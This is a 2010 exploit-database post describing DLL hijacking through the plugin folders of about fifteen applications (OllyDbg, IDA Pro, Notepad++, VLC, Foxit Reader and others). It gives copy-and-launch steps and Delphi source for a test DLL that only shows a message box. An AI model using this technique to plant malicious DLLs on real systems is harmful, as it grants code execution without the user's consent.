Home / os / win7

[local expoits] - Plugins Dll Hijacking Exploit

Posted on 07 September 2010

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Strict//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd'><html xmlns='http://www.w3.org/1999/xhtml'><head><meta http-equiv='Content-Type' content='text/html; charset=utf-8' /><meta http-equiv='Content-Language' content='en' /><title>Plugins Dll Hijacking Exploit | Inj3ct0r - exploit database : vulnerability : 0day : shellcode</title><meta name='description' content='Exploit category: local expoits | Exploit author: STRELiTZIA' /><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon' /><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss' /><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></head><body><pre>============================= Plugins Dll Hijacking Exploit ============================= Exploit Title: [Dll Hijacking Exploit] Application: [Application plugin support] Date: [07 Sept 2010] Author: [STRELiTZIA] Version: [%Applications list%] Tested on: [Windows Xp, Vista, Windows 7] Description: ------------ Allows other applications dynamic link libraries to execute malicious code without the users consent, in the privilege context of the targeted application. Download Test.dll link () Applications list: (Tested) ----------------- FastScanner ExeInfoPE Stud_PE PE Explorer OllyDbg IDA Pro (*.plw) notepad++ Hex Workshop Foxit Reader PhotoFiltre Studio X VLC Media player Import REConstructor PE Tools by NEOx DiE- DETECT iT EASY Instructions: ------------- 1- Copy &quot;Test.dll&quot; into &quot;Application\%plugin%&quot; Perform this tests: ------------------- - Launch Application. Test Dll Delphi Source: ---//--- Library Test; uses Windows; begin MessageBoxA ( 0, PChar(&#039;Yep, I&#039;&#039;m running in your system without your permission :)&#039;), PChar(&#039;Sample&#039;), MB_ICONSTOP ); end. ---//--- c) 2010 by STRELiTZIA. # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-09-07]</pre></body></html>

 

TOP